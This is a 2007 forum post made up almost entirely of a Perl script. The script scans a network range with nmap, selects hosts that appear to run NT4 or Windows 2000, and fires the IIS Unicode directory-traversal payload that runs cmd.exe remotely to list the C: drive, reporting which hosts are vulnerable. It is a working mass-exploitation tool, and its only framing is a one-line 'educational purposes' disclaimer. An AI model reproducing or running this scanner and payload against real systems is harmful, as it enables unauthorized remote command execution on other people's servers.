zbeng Posted June 10, 2007 Report Posted June 10, 2007 #!/usr/bin/perl# uni-test.pl# this is a test program and should be used for educational purposes ONLY!# NOTE: this was written on a RH Linux6.2 X86 based system.# you will also need to DL and compile the LWP::Simple.pm module for perluse LWP::Simple;use Getopt::Std;getopts("vt:?",\%args);# here goes nothing...if ( $args{t} ) { $target = $args{t};} else { usage();}if ( $args{"?"} ) { usage();}print "Running nmap...\n";if ( $args{v} ) { system("nmap -sS -p 80 -O $target -oM /tmp/targetnet");} else { system("nmap -sS -p 80 -O $target -oM - > /tmp/targetnet");}open(TARGETNET, "/tmp/targetnet") || die "Cannot open file: /tmp/targetnet";print "Please hold checking all servers in list\n";print "----------------------------------------\n\n";while (<TARGETNET>) { (/^\n/) && next; (/Starting nmap/) && next; (/^\#/) && next; if ( /^Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*?OS: (.*)/ ) { $ipaddress = $1; $osguess = $2; if ( $osguess =~ /NT4/ || $osguess =~ /Windows 2000/ ) { print "Checking $ipaddress for uni-code exploit\n"; $content = get("http://$ipaddress/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\"); if ( $content =~ /Directory of c\:\\/ ) { print "$ipaddress is vulnerable\n"; } } } else { warn "Cannot parse: $_"; }}close(TARGETNET);sub usage { print <<USAGE;Usage: perl uni-test.pl [-v?] -t <target host/net> -v Verbose ( Show nmap output ) -? Show this screen -t <target> <target> is the nmap host or range you would like to scan sample: 192.168.0.2-254Note: This program requires you to be root, and for you to have the program NMAP installed.USAGEexit; } Quote
